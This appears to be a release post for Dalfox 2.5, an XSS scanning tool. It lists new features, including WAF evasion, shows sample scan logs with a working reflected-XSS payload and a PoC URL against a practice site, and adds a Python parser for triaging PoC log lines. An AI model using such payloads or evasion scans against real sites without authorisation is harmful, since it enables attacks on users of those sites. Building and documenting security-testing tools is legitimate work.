Dalfox 2.5 Released 🚀

A minor version of Dalfox has been released after a long time. It is mainly a performance improvement, and it detects much better than before :D

https://github.com/hahwul/dalfox/releases/tag/v2.5.0

  • Improve scanning
  • Improve mining
  • Improve logger and output
  • Improve silence mode (progress)
  • Improve structure of the document page and add contents
  • Add WAF Detection and Evasion (--waf-evasion flag)
  • and bug fixes

Added Injection point in Log

[I] Reflected query param => PTYPE: URL  Injected: /inHTML-none(1)  {  \  +  =  )  `  :  <  [  (  "  ,  .  ]  ;  |  -  '  >  }  $
    13 line:  Sorry, no results were found for <b>1234DalFox</b>. <a href='?'>Try again
[V] Triggered XSS Payload (found DOM Object): query=<xmp><p title="</xmp><svg/onload=alert(1) class=dalfox>
    13 line:  re found for <b>1234<xmp><p title="</xmp><svg/onload=alert(1) class=dalfox></b>.
[POC][V][GET][inHTML-none(1)-URL] https://xss-game.appspot.com/level1/frame?query=1234%3Cxmp%3E%3Cp+title%3D%22%3C%2Fxmp%3E%3Csvg%2Fonload%3Dalert%281%29+class%3Ddalfox%3E

inHTML-none(1)-URL means the payload was injected into the HTML area from the URL query. Please check this document.
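
A small parser for the [POC] line format shown above, splitting the inHTML-none(1)-URL label into its parts so findings can be grouped per injection point during triage. This is an added example, not part of Dalfox or the original post; the field names (context, quoting, n, ptype), triage_key and group_findings are assumptions, and the post does not define what the parenthesised number means.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Layout read off the sample output above:
#   [POC][<type>][<method>][<context>-<quoting>(<n>)-<ptype>] <url>
POC_RE = re.compile(
    r"^\[POC\]\[(?P<type>[A-Z])\]\[(?P<method>[A-Z]+)\]"
    r"\[(?P<context>in[A-Za-z]+)-(?P<quoting>[a-z]+)"
    r"\((?P<n>\d+)\)-(?P<ptype>[A-Za-z]+)\]\s+(?P<url>\S+)$"
)

def parse_poc(line):
    """Return the fields of one [POC] line, or None for any other log line."""
    m = POC_RE.match(line.strip())
    if m is None:
        return None
    f = m.groupdict()
    f["n"] = int(f["n"])  # number in parentheses; its meaning is not stated in the post
    parts = urlsplit(f["url"])
    f["host"], f["path"] = parts.hostname, parts.path
    # parse_qs percent-decodes values and turns '+' into a space
    qs = parse_qs(parts.query, keep_blank_values=True)
    f["params"] = {k: v[0] for k, v in qs.items()}
    return f

def triage_key(f):
    """Assumed grouping: same endpoint, label and parameter names = one injection point."""
    return (f["host"], f["path"], f["context"], f["quoting"], f["ptype"],
            tuple(sorted(f["params"])))

def group_findings(log_text):
    """Collapse repeated PoCs so each injection point is reviewed once."""
    groups = {}
    for f in filter(None, map(parse_poc, log_text.splitlines())):
        groups.setdefault(triage_key(f), []).append(f)
    return groups

# Lines 1-2 come from the output above (line 1 shortened); lines 3-4 are constructed.
SAMPLE = """\
[I] Reflected query param => PTYPE: URL  Injected: /inHTML-none(1)
[POC][V][GET][inHTML-none(1)-URL] https://xss-game.appspot.com/level1/frame?query=1234%3Cxmp%3E%3Cp+title%3D%22%3C%2Fxmp%3E%3Csvg%2Fonload%3Dalert%281%29+class%3Ddalfox%3E
[POC][V][GET][inHTML-none(1)-URL] https://xss-game.appspot.com/level1/frame?query=constructed-duplicate
[POC][V][GET] truncated line without an injection label
"""

if __name__ == "__main__":
    for key, items in group_findings(SAMPLE).items():
        print(len(items), "PoC(s) for", key)
```

Lines that do not match the full layout return None instead of a partial record, so a truncated log line is never counted as a finding.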

WAF Detection

[I] Found 0 testing point in DOM base parameter mining
[I] Found WAF: 360 Web Application Firewall (360)
[I] Content-Type is text/html; charset=utf-8
[I] Reflected PATH '/test/path/dalfoxpathtest' => Injected: /inATTR-double(1)]